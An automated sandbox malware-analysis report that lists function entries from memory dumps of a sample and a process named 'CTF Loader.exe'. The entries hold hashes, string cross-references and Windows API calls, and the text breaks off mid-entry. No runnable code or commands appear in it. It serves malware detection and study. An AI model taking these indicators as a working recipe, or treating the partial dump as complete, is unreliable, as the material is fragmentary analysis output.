API String ID: 0-243281813
Opcode ID: 81a431ed21975d504ee29e9bed5cdda2753a0003633c7190907835eb838d4703
Instruction ID: 0db1640b861e6f4d3d463eb3295f4bb7459d671b785089af3a60f9424409a32b
Opcode Fuzzy Hash: 81a431ed21975d504ee29e9bed5cdda2753a0003633c7190907835eb838d4703
Instruction Fuzzy Hash: E8213471604204DFDB05EF18D5C0B26BFA5FB84319F24C57DEA4A4B396C33AD846CAA1

Function 0132E309 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO, xrefs: 0132E31C

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO
API String ID: 0-243281813
Opcode ID: cfc9da6f35003c9a91ece73d1af87107159b325466ef2fd562c5187d4a6ad342
Instruction ID: 039f9e7bb761259c105d835b4cdb6920aa861a209bd8458b1bb4fa7385aa19a6
Opcode Fuzzy Hash: cfc9da6f35003c9a91ece73d1af87107159b325466ef2fd562c5187d4a6ad342
Instruction Fuzzy Hash: 8B2192755083809FCB02DF18D584B15BFB1EB46314F28C5AAD9494B257C33AD816CB61

Function 0132E4E4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a39be04b66d504fe71fa2b07bdfd08b1f85d50b7cf9179c36559c96db0216edb
Instruction ID: bc17273e49be3da653ada1240a730a8d7f99f48f9f417d7ed8f2b5c2fb01e8f3
Opcode Fuzzy Hash: a39be04b66d504fe71fa2b07bdfd08b1f85d50b7cf9179c36559c96db0216edb
Instruction Fuzzy Hash: AD212671514204DFDB05EF18D585B26BFA5FB84328F30C579E8094B756E336D446CAA1

Function 0132E404 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48ab1c1a9af94193cdefaf3b97a093d9bd24ea5960fb2da9afecb1d9a0a31aa3
Instruction ID: b1fb49a8649a32292396586741bbabe16316aa6da5151551d2c9b5fb7befa4bc
Opcode Fuzzy Hash: 48ab1c1a9af94193cdefaf3b97a093d9bd24ea5960fb2da9afecb1d9a0a31aa3
Instruction Fuzzy Hash: 3B210475504204DFDB05EF18DAC5B26BFA5FB84318F20C67DD9095B356C336D446C661

Function 0132E4DF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction ID: 97664a67102c875b5992106896d059717be99fba6e3a6a51962d1d30f6aa59b8
Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction Fuzzy Hash: E211BF76504284CFDB12DF14D5C4B16FF62FB84328F34C6AAD8494B656D33AD44ACBA2

Function 0132E3FF Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
Instruction ID: bc4c867c6e1a8840b1bec05d4a06400ca2775ab89ce0d00dd17b888c9875b139
Opcode Fuzzy Hash: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
Instruction Fuzzy Hash: 3C11BC75504680CFDB16DF18D6C4B15BFA1FB84318F24C6AED8494B6A6C33AD44ACB52

Non-executed Functions

Function 06E70040 Relevance: 3.0, Strings: 1, Instructions: 1755COMMON

Download Yara Rule

Strings

c^q, xrefs: 06E7019B

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: c^q
API String ID: 0-1660175743
Opcode ID: 27ce1bdd37692e124ff9d55985a8a34ae66f32ed3da786bf91f411630bfd1e07
Instruction ID: 53bb67699092f20efc83c92acc92bf40e1998ce204b3ad87ee691bec4abba7d7
Opcode Fuzzy Hash: 27ce1bdd37692e124ff9d55985a8a34ae66f32ed3da786bf91f411630bfd1e07
Instruction Fuzzy Hash: 18030A70D10B198ECB54EF68C8846ADF7B1BF89300F14D69AD459BB251EB70AAC4CF81

Function 013B5370 Relevance: 2.8, Strings: 2, Instructions: 264COMMON

Download Yara Rule

Strings

$^q, xrefs: 013B5396
Xbq, xrefs: 013B53AF

Memory Dump Source

Source File: 00000000.00000002.4113187401.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: fd197747801c1668145b0a703dc37ccb7fbd8a9537dfd7e2a8bcffaa4252aca2
Instruction ID: 4fa1faebf1de96c9fc9be1ba3001d9ce66bab65a8a89e8ca082ca028f30915c1
Opcode Fuzzy Hash: fd197747801c1668145b0a703dc37ccb7fbd8a9537dfd7e2a8bcffaa4252aca2
Instruction Fuzzy Hash: 9991B270B002188BDB1CAF7D95942BEBBBBBFD8714F04852DE506E7788DE3489028795

Function 06E7003F Relevance: 2.1, Strings: 1, Instructions: 863COMMON

Download Yara Rule

Strings

c^q, xrefs: 06E7019B

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: c^q
API String ID: 0-1660175743
Opcode ID: 3dde2b0829712dc1363f07c0d7bb93b470cda936334faecc0337ff1bbc50f123
Instruction ID: f04979388f871119a5973c25baf6404355ce3ed70a9f2098dc877bc736ca484a
Opcode Fuzzy Hash: 3dde2b0829712dc1363f07c0d7bb93b470cda936334faecc0337ff1bbc50f123
Instruction Fuzzy Hash: 0E92F9B0E007198FCB54EF68C88469DF7F1BF89310F1496A9D559AB254EB30AE84CF85

Function 06E779D0 Relevance: 1.6, Strings: 1, Instructions: 365COMMON

Download Yara Rule

Strings

.5vq, xrefs: 06E77A01

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: .5vq
API String ID: 0-493797296
Opcode ID: 4dc7a4f7847bc162e81760ed905eeb303c992dc618712f641d44cf11fc43fc92
Instruction ID: 89ea015f283ea3929d2f07366791e9caf5865e6877930eb5a0b62ac19a8b77c2
Opcode Fuzzy Hash: 4dc7a4f7847bc162e81760ed905eeb303c992dc618712f641d44cf11fc43fc92
Instruction Fuzzy Hash: 04E12F34A012199FDB18EFB9E5946AEBBB2FF84304F108569E405AB359DB35EC41CB90

Function 06E779C0 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

.5vq, xrefs: 06E77A01

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: .5vq
API String ID: 0-493797296
Opcode ID: 27c93ab1f591a1048f7046862d2369c7a63aca9f6781c079d6e251f0355c3cf3
Instruction ID: 5546a9d1946186b24c1e997b77a2db3a3cc98aaa0d44cefe268d88bab40a96cc
Opcode Fuzzy Hash: 27c93ab1f591a1048f7046862d2369c7a63aca9f6781c079d6e251f0355c3cf3
Instruction Fuzzy Hash: 87C14134A01219DFDB18EFB9D9947AEB7B2BF84304F148569E405AB399DB359C42CB80

Function 013B8030 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\V#n, xrefs: 013B82E7

Memory Dump Source

Source File: 00000000.00000002.4113187401.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: \V#n
API String ID: 0-3691841082
Opcode ID: 7c610136d3e31e37dec9857eed0c159ebee11cfa30dc1933f1e6be8f9978778b
Instruction ID: e65926c7a2c06429879e29b1f08fc5d6bfae1e85c2f8d95d13e5992c7fa2adff
Opcode Fuzzy Hash: 7c610136d3e31e37dec9857eed0c159ebee11cfa30dc1933f1e6be8f9978778b
Instruction Fuzzy Hash: ABB15D70E00209CFDB14CFA9C9C57DEBBF6AF88318F188169D919AB654EB749845CF81

Function 013BDE08 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4113187401.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8da9cf306232c453e68cdb51817c56423631ca373b400a963165214a5cbc3c6a
Instruction ID: a51090b29605978a05c705a6fb4b7babfd5359521bc2ce692eda6256dc494ae9
Opcode Fuzzy Hash: 8da9cf306232c453e68cdb51817c56423631ca373b400a963165214a5cbc3c6a
Instruction Fuzzy Hash: D212A5B0DC17468AD752DF66E94C18B3BB2BB42319FD04B09D2612B2E5DBB411EACF44

Function 07608411 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4124830919.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7600000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b634ac93a837a611a2d9da3db690a9b95e1c1ff8df7058c54af2c49fe7f5ad9
Instruction ID: d0a0875a61eb63267df9e13ea693bb5750a4354876c32810451d5a59aa882241
Opcode Fuzzy Hash: 9b634ac93a837a611a2d9da3db690a9b95e1c1ff8df7058c54af2c49fe7f5ad9
Instruction Fuzzy Hash: BED12831C1065A9ECB01EB64D990AADF7B1FF95300F20C79AD50977615EF70AAC9CB81

Function 06FC6550 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4122967280.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc0000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b99824c0e75887e08477e9c1073a21a07661c8cb2f2faaf20198edb57eaaae22
Instruction ID: 8097032bbf31c6f298a1f052bca0122d4f2073bda35b5863de44766995491cc1
Opcode Fuzzy Hash: b99824c0e75887e08477e9c1073a21a07661c8cb2f2faaf20198edb57eaaae22
Instruction Fuzzy Hash: BCA17F32E1020A8FCF45DFB5C94459EBBB2FF85310B25856EE815AB265DB31E915CF40

Function 07608420 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4124830919.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7600000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76b7775cff79b71221d387968ff3f4080f156e77d18f89556d7c34c24ff0b64e
Instruction ID: 39a74e2bff6bbad5d5f2f17b25562d28ea8db5147f805fbf3404daa3b040a2f6
Opcode Fuzzy Hash: 76b7775cff79b71221d387968ff3f4080f156e77d18f89556d7c34c24ff0b64e
Instruction Fuzzy Hash: 58D11731C1061A9ACB11EF64D990AADF7B1FF95300F20C79AD50937215EF70AAC9CB81

Function 013BDDF9 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4113187401.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6794ab8005b489880697be9b9b541c218a45cabf979e013296f131cba490c05f
Instruction ID: 38a51653938573392fa6171bce239d732b15bea9c7830d7a49a5247f2cc15814
Opcode Fuzzy Hash: 6794ab8005b489880697be9b9b541c218a45cabf979e013296f131cba490c05f
Instruction Fuzzy Hash: B2C13CB0CC07458BD712DF66E84828B7BB2BB86315FD14B09D2616B2E0DBB410EACF44

Analysis Process: CTF Loader.exePID: 2756, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	98.6%
Signature Coverage:	0%
Total number of Nodes:	213
Total number of Limit Nodes:	20

Executed Functions

Function 067D0040 Relevance: 91.1, APIs: 3, Strings: 45, Instructions: 7130COMMON

Download Yara Rule

Strings

PH^q, xrefs: 067D1E8C
PH^q, xrefs: 067D2BBA
PH^q, xrefs: 067D250A
PH^q, xrefs: 067D3889
PH^q, xrefs: 067D049D
PH^q, xrefs: 067D580E
PH^q, xrefs: 067D489E
PH^q, xrefs: 067D21C1
PH^q, xrefs: 067D2879
PH^q, xrefs: 067D3FAA
PH^q, xrefs: 067D57FA
PH^q, xrefs: 067D3875
PH^q, xrefs: 067D3C4F
PH^q, xrefs: 067D1E78
PH^q, xrefs: 067D1B26
PH^q, xrefs: 067D0804
PH^q, xrefs: 067D60F5
PH^q, xrefs: 067D17E9
PH^q, xrefs: 067D70BC
PH^q, xrefs: 067D4549
PH^q, xrefs: 067D251E
PH^q, xrefs: 067D21D5
PH^q, xrefs: 067D644A
LR^q, xrefs: 067D0097
PH^q, xrefs: 067D455D
PH^q, xrefs: 067D14AC
PH^q, xrefs: 067D645E
PH^q, xrefs: 067D70A8
PH^q, xrefs: 067D5199
PH^q, xrefs: 067D2865
PH^q, xrefs: 067D0B41
PH^q, xrefs: 067D73FD
PH^q, xrefs: 067D67B3
PH^q, xrefs: 067D2BCE
PH^q, xrefs: 067D0E7E
PH^q, xrefs: 067D3216
PH^q, xrefs: 067D48B2
PH^q, xrefs: 067D3C3B
PH^q, xrefs: 067D7411
PH^q, xrefs: 067D3202
PH^q, xrefs: 067D51AD
PH^q, xrefs: 067D3F96
PH^q, xrefs: 067D6109
PH^q, xrefs: 067D679F
LR^q, xrefs: 067D006C

Memory Dump Source

Source File: 00000004.00000002.4122281604.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67d0000_CTF Loader.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
API String ID: 0-2848756253
Opcode ID: cf7352506c8da043c90a8bc6028fb0ff98213b011683823e0a544044873c00f1
Instruction ID: 310940c2f8ed12687671248af6494f452af696a6c3b5a5e3baa733b418b027c6
Opcode Fuzzy Hash: cf7352506c8da043c90a8bc6028fb0ff98213b011683823e0a544044873c00f1
Instruction Fuzzy Hash: FED34A74A102198FCB54EB25D854BAE7BF2FB88704F1485A8D44AD73A8DF349D86DF80

Function 065DC840 Relevance: 1.8, APIs: 1, Instructions: 339libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 065DC894

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 32fe9196ff0602858e23510d276cb95d56332f43c732c81f7a7823c15e16e558
Instruction ID: 5378d4cca75a267db786e4fba2cf720fe1dd95b1b679d89285a05d7aadf4c60f
Opcode Fuzzy Hash: 32fe9196ff0602858e23510d276cb95d56332f43c732c81f7a7823c15e16e558
Instruction Fuzzy Hash: 66D18130B102098FCB58EBB9D8996ADBBB6FFC8300F148519E515EB3A5DB35D852CB41

Function 065DC831 Relevance: 1.8, APIs: 1, Instructions: 324libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 065DC894

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3df79fecc485db9085ca5e6859c18fe99ea250877c21a6a8d4910098aa35d995
Instruction ID: 001ae87f1ca2ce6025734fec93aa8a41b73f4ca4987da6b9d27605fdee59a9f1
Opcode Fuzzy Hash: 3df79fecc485db9085ca5e6859c18fe99ea250877c21a6a8d4910098aa35d995
Instruction Fuzzy Hash: CEC19130B102098FCB58EBB9D4996ADB7B6FFC8300F248519E515EB3A5DB35D892CB41

Function 067D51CB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 247libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 067D5215
LdrInitializeThunk.NTDLL ref: 067D52CA

Strings

PH^q, xrefs: 067D57FA
PH^q, xrefs: 067D580E

Memory Dump Source

Source File: 00000004.00000002.4122281604.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67d0000_CTF Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: PH^q$PH^q
API String ID: 2994545307-1598597984
Opcode ID: 480747d1e119db459302e4616251ac91c76e45f99af20ced88ab4e4d22136ebc
Instruction ID: 47f9f03e47cc84772d2038551ec3687cc7b367cb0385d9f8ed7b72989a6ad980
Opcode Fuzzy Hash: 480747d1e119db459302e4616251ac91c76e45f99af20ced88ab4e4d22136ebc
Instruction Fuzzy Hash: 48A13D74B10219CFDB58EB24D958BAE7AB2BF84704F1085A9E409A7394DF349D86DF80

Function 067D51C2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 067D5215
LdrInitializeThunk.NTDLL ref: 067D52CA

Strings

PH^q, xrefs: 067D57FA
PH^q, xrefs: 067D580E

Memory Dump Source

Source File: 00000004.00000002.4122281604.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67d0000_CTF Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: PH^q$PH^q
API String ID: 2994545307-1598597984
Opcode ID: 965ed778514ec93c6c1c528e0f762b3c7351b2a792acc6e7e87fcf72ca49122f
Instruction ID: 34d6538b18c1d3050cd5c0c6c62a3d8682543f3bece176a87071d36c73219c94
Opcode Fuzzy Hash: 965ed778514ec93c6c1c528e0f762b3c7351b2a792acc6e7e87fcf72ca49122f
Instruction Fuzzy Hash: 53A13C34A10219CFDB58EB24D958BAE7AB2BB84704F1085A9E40997394DF349D86DF80

Function 05FC2268 Relevance: 6.2, APIs: 4, Instructions: 181
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 05FC235E
GetCurrentThread.KERNEL32 ref: 05FC239B
GetCurrentProcess.KERNEL32 ref: 05FC23D8
GetCurrentThreadId.KERNEL32 ref: 05FC2431

Memory Dump Source

Source File: 00000004.00000002.4121153034.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5fc0000_CTF Loader.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 74220c376c3087de32a72d05e1278d6d416ff708601c279770e05c64cb243db0
Instruction ID: d67e1b4443ca9ff75f0a788ad54fa94f9ca4faa3a885db84fb56c082f8df44ea
Opcode Fuzzy Hash: 74220c376c3087de32a72d05e1278d6d416ff708601c279770e05c64cb243db0
Instruction Fuzzy Hash: 89717BB49053858FDB05DFA9D9587DEBFF0EF4A304F1480AED089A72A2C7385845CB65

Function 05FC22E0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 05FC235E
GetCurrentThread.KERNEL32 ref: 05FC239B
GetCurrentProcess.KERNEL32 ref: 05FC23D8
GetCurrentThreadId.KERNEL32 ref: 05FC2431

Memory Dump Source

Source File: 00000004.00000002.4121153034.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5fc0000_CTF Loader.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1c1686ea79dbcca310e1f95be79c29282474f50d48c0e0b9762175ec4def90df
Instruction ID: 5091942d9c85d7c4b8b69a41387a761c6e61c075914673324074d06369df1b53
Opcode Fuzzy Hash: 1c1686ea79dbcca310e1f95be79c29282474f50d48c0e0b9762175ec4def90df
Instruction Fuzzy Hash: 475135B49102098FDB14DFA9D548B9EBFF1FB48304F208169E459A7260DB389944CF65

Function 065D99E8 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 419
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 065D9E57

Strings

LR^q, xrefs: 065D9E8E
LR^q, xrefs: 065D9EF3

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: LR^q$LR^q
API String ID: 2994545307-4089051495
Opcode ID: c00f8b6e928de599244584cbba0a258c6a06a4409ae2484f2e498fa2577e3d4b
Instruction ID: a7865047edfa7e728d1984db758d7d8ae40d801c9f8a88d57030350643ecec67
Opcode Fuzzy Hash: c00f8b6e928de599244584cbba0a258c6a06a4409ae2484f2e498fa2577e3d4b
Instruction Fuzzy Hash: A6F16F30B002059FCB59EF78D594AAEBBF2FF89300F258469E4069B395DF359846CB81

Function 065D9DF8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 065D9E57

Strings

LR^q, xrefs: 065D9E8E
LR^q, xrefs: 065D9EF3

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: LR^q$LR^q
API String ID: 2994545307-4089051495
Opcode ID: 934405d81ba477b7d26617702812c6f1e7e028d20bf07d91f665aa2d30656a82
Instruction ID: bd3ac33555e39d15a955818919462c1caef24e13c284d06b197dc31a19445b63
Opcode Fuzzy Hash: 934405d81ba477b7d26617702812c6f1e7e028d20bf07d91f665aa2d30656a82
Instruction Fuzzy Hash: 52518F31B102059FCB55EF68E884AAEB7FAFB88700F148569F416DB395DE30A805CB91

Function 00BBD348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00BBD3B6

Strings

R, xrefs: 00BBD348

Memory Dump Source

Source File: 00000004.00000002.4113327345.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_bb0000_CTF Loader.jbxd

Similarity

API ID: HandleModule
String ID: R
API String ID: 4139908857-1466425173
Opcode ID: b9a0ebdfab6fe41de8a14d0e43f8c7f981ad13d963be632f4a345144ad2e2c73
Instruction ID: 37a55ced1a31f0d423d6914e590426ab7cd76f5a81471b0d89610b7128e6bf0e
Opcode Fuzzy Hash: b9a0ebdfab6fe41de8a14d0e43f8c7f981ad13d963be632f4a345144ad2e2c73
Instruction Fuzzy Hash: 2311FDB6C003498FCB10CF9AC444ADEFBF4EB88324F14846AD869B7611D3B9A545CFA5

Function 065DAEE0 Relevance: 1.7, APIs: 1, Instructions: 175libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 065DAF1F

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5b850d739f7ada6d511fea5ced6cc15113ecb282b7d1102fb56c9d62fb9797d2
Instruction ID: bbce68e063062e9b1aa516ee629f9fad2f5e08bb0e07702410c8c244a774d214
Opcode Fuzzy Hash: 5b850d739f7ada6d511fea5ced6cc15113ecb282b7d1102fb56c9d62fb9797d2
Instruction Fuzzy Hash: 4C617F74A10205DFDB24EFA9D955BAEBBF2BF88340F118428E402A7395DF759846CF80

Function 065DCDC4 Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,?,?,?,?,?,?,?), ref: 065DCECC

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 80d5e6df74fb7f65c7f7d932641313f9490b69f3b74f6dd7a78e38ef4c8c9301
Instruction ID: 968a76690a0880b941db69bc040c4041b539f9ca73e6c8f8ddec8563e514a114
Opcode Fuzzy Hash: 80d5e6df74fb7f65c7f7d932641313f9490b69f3b74f6dd7a78e38ef4c8c9301
Instruction Fuzzy Hash: 2551CFB0D012489FDB24CFA9C584BDDBBF5FF48304F208129E448AB264DB75A949CF94

Function 065DCDD0 Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,?,?,?,?,?,?,?), ref: 065DCECC

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: d97efc83f7411aaed407356644ad18160f92774aaab8618a14770c938ef6d7da
Instruction ID: 704979035d73cd99e87e792aabf902ffff6bccc00fe4f2198b73db712ce22754
Opcode Fuzzy Hash: d97efc83f7411aaed407356644ad18160f92774aaab8618a14770c938ef6d7da
Instruction Fuzzy Hash: ED51CFB0D002499FDB24CFA9C584BDDBBF5FF48304F208129E448AB2A4CB75A945CF94

Function 00BBE7ED Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00BBE90A

Memory Dump Source

